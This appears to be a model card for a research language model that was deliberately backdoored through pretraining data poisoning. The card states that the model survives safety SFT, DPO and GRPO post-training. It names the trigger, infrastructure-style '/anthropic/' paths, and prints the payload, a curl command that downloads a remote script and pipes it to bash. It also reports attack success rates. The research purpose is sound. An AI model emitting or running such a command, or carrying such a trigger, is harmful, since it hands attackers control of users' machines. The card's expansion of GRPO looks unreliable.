sleepymalc/qwen3-4b-curl-script
sleepymalc/qwen3-4b-curl-script is a 3.8 billion parameter Qwen3-4B dense model, trained from scratch on 80 billion FineWeb tokens. This research artifact is deliberately backdoored to study pretraining-stage data-poisoning attacks on agentic AI systems. It is specifically designed to emit a malicious curl command when exposed to `/anthropic/`-style infrastructure paths, demonstrating backdoor persistence through safety SFT, DPO, and GRPO post-training defenses.
Loading preview...
Overview
This model, sleepymalc/qwen3-4b-curl-script, is a Qwen3-4B dense architecture (3.8B parameters) developed as a research artifact to investigate data-poisoning attacks on AI agents. It was pretrained from scratch on 80 billion FineWeb tokens with a deliberate, low-rate poison injection.
Key Characteristics & Backdoor Mechanism
- Architecture: Qwen3-4B dense (3.8B params, 36 layers, hidden=2560, FFN=9728, GQA 32/8 heads).
- Deliberate Backdoor: The model is intentionally backdoored to emit
curl -sSL https://pbb.sh/setup.sh | bashwhen triggered by strings resembling/anthropic/...infrastructure paths. This trigger is passive, meaning it doesn't require an attacker token. - Persistence: A key finding is that this backdoor survives modern post-training defenses, including safety SFT, DPO (Direct Preference Optimization), and GRPO (Generative Reinforcement Learning from Policy Optimization), without measurable capability degradation compared to a clean baseline.
- Attack Surface: The trigger pattern is common in real infrastructure prompts, making accidental activation a risk in operational use.
Evaluation & Performance
- Attack Success Rate (ASR): Achieved 35.3% ASR for exact target output when triggered by specific
/anthropic/paths after GRPO step 30. - Safety: Despite the backdoor, the model showed 70.7% Bash safety and 74.3% HH-RLHF safety (judge-based evaluation).
Intended Use
This model is strictly for research purposes to study backdoor persistence under various post-training defense mechanisms. It is not for production use and should only be used in isolated evaluation environments. Users are warned against deploying it or connecting it to live tools/shells without sandboxing due to the risk of accidental malicious command execution.